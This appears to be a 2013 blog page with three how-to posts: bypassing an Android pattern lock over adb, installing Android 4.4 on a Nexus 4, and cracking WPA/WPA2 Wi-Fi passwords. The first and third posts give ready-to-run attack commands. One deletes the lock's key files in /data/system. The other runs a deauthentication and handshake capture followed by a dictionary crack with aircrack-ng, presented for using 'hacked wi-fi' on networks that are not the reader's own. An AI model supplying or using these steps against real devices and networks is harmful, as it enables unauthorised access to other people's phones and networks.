Wednesday, December 4, 2013

How To Bypass Android Pattern Unlock

BY Unknown IN , , No comments


How to bypass android pattern unlock [3 STEPS!]

Requirements :

Linux distro
Android phone
USB cable
ADB

Step 1.
1.Connect your phone to your PC using USB cable.

Step 2. - Installing ADB over terminal
1.Boot into any Linux distro you have.
2.Open up terminal and type :

Quote:sudo apt-get install android-tools-adb

This will install ADB.

Step 3. - Disabling pattern unlock over terminal
1.Open up terminal again and type :

Quote:adb devices
adb shell
cd data/system
su
rm *.key

Now,disconnect your phone and reboot.Unlock pattern should be here.Just try some random gesture and it will unlock.

How to install Android 4.4 on your Nexus 4

BY Unknown IN , No comments


How to install Android 4.4 on your Nexus 4 !! Pt 3

Installation using TWRP Recovery

1: Boot the phone into recovery mode. Power off the phone and wait for about four to five seconds for lights to go off. Press and hold Volume Down and Power buttons together and release the Power button once the Google logo appears but keep holding the Volume Down button. The device will be in Bootloader Mode 
Press the Volume Down two times so that Recovery option will appear and then press the Power button to reboot into recovery mode

2: Create a Backup from recovery !!!

3. Perform a Factory Reset (This will delete all apps and their settings and game progress). Tap on Wipe then at the bottom of the screen do a Swipe on the Swipe to factory reset option

4. Click on Install then browse to the location where the Android 4.4 KitKat AOSP ROM file is saved, tap on the file and then at the bottom of the screen do a swipe on the Swipe to Confirm Flash option to begin flashing

5. When the ROM flashing is completed, repeat the similar steps to install Google Apps

6. After the installation process is completed, return to the main recovery menu and tap on Reboot and then tap on System to reboot the phone. The phone will take some time to reboot for the first time

That is it. Once the Nexus 4 boots up, it should be updated with AOSP Android 4.4 KitKat firmware.

How To Hack Wi-Fi WPA/WPA2 Password Video Tutorial

BY Unknown IN , No comments


How To Hack Wi-Fi WPA/WPA2 Password With Video Tutorial

***********************************
Hello everybody, this is today i'm gonna show you how to hack any wi-fi passwords using backtrack 5

What We Need to hack Wi-fi Password?

1)Backtrack 5 [ R1 or R2]

2)Compatable Wi-fi Card

So Let's Start... 1st open Terminal and Then Follow My Steps :

1)In Terminal type : airmon-ng there we can see interfaces

2)Then type :airmon-ng start wlan0 It must found proceses

3)then we type : airodump-ng mon0 it will start scanning wi-fi networks

4)copy bssid and tpye : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0

5)type : aireplay-ng -0 5 -a (bssid) mon0

6)click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in
terminal

7)type in terminal : aircrack-ng (filename)*.cap -w (dictionary location) And Hit Enter!

Success!

Video tutorial here ==> https://www.youtube.com/watch?v=aLi7V0-YNIo

Author :- Namit Behl

password now has been hacked.... so you can enter and enjoy with hacked wi-fi : ))